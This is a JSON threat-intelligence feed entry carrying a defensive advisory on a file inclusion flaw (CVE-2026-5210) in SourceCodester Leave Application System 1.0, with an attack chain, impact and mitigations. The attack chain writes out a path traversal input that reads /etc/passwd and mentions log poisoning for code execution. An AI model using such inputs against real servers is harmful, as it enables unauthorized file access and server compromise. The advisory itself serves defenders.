{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/cve-2026-5210/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-5210"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cve-2026-5210","file-inclusion","web-application"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSourceCodester Leave Application System version 1.0 is vulnerable to a file inclusion vulnerability (CVE-2026-5210). This vulnerability allows a remote attacker to include arbitrary files on the server by manipulating the \u003ccode\u003epage\u003c/code\u003e argument in a request.  The vulnerability exists because the application fails to properly sanitize user-supplied input, leading to the inclusion of potentially malicious files. Public exploits are available, increasing the risk of exploitation. This vulnerability poses a significant threat to organizations using the affected application, as it can lead to remote code execution and data exfiltration.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a page within the SourceCodester Leave Application System 1.0 that uses the \u003ccode\u003epage\u003c/code\u003e parameter to include files.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious URL containing the \u003ccode\u003epage\u003c/code\u003e parameter, injecting a path to a local file (e.g., \u003ccode\u003e../../../../etc/passwd\u003c/code\u003e) or a remote file via a URL.\u003c/li\u003e\n\u003cli\u003eThe vulnerable application processes the attacker-supplied \u003ccode\u003epage\u003c/code\u003e parameter without proper sanitization or validation.\u003c/li\u003e\n\u003cli\u003eThe application attempts to include the file specified by the attacker\u0026rsquo;s malicious URL.\u003c/li\u003e\n\u003cli\u003eIf the file is successfully included, the attacker can read sensitive information (e.g., \u003ccode\u003e/etc/passwd\u003c/code\u003e, database configuration files).\u003c/li\u003e\n\u003cli\u003eIf the attacker can include a PHP file (e.g., via a log poisoning attack), they can achieve remote code execution on the server.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary commands on the server with the privileges of the web server user.\u003c/li\u003e\n\u003cli\u003eThe attacker can then pivot to other systems, install malware, or exfiltrate sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information, such as configuration files, source code, and user credentials.  Remote code execution is possible if the attacker can include a PHP file, potentially leading to complete system compromise.  This could impact all users of the Leave Application System, potentially exposing employee data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or upgrade to a secure version of SourceCodester Leave Application System to remediate CVE-2026-5210.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect attempts to exploit the file inclusion vulnerability by monitoring for suspicious \u003ccode\u003epage\u003c/code\u003e parameter values in web server logs.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation and sanitization for all user-supplied input, especially parameters used for file inclusion.\u003c/li\u003e\n\u003cli\u003eRestrict file system access for the web server user to only the necessary directories to prevent unauthorized file access.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for access to sensitive files, such as \u003ccode\u003e/etc/passwd\u003c/code\u003e, database configuration files, and application source code.\u003c/li\u003e\n\u003cli\u003eBlock the reported malicious URL \u003ccode\u003ehttps://medium.com/@hemantrajbhati5555/local-file-inclusion-lfi-in-leave-application-system-php-sqlite3-4e095bb7ee40\u003c/code\u003e at the network perimeter.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T19:16:29Z","date_published":"2026-03-31T19:16:29Z","id":"/briefs/2026-04-sourcecodester-lfi/","summary":"SourceCodester Leave Application System 1.0 is vulnerable to remote file inclusion (CVE-2026-5210) due to improper handling of the 'page' argument, potentially allowing attackers to execute arbitrary code.","title":"SourceCodester Leave Application System 1.0 File Inclusion Vulnerability (CVE-2026-5210)","url":"https://feed.craftedsignal.io/briefs/2026-04-sourcecodester-lfi/"}],"language":"en","title":"CraftedSignal Threat Feed — Cve-2026-5210","version":"https://jsonfeed.org/version/1.1"}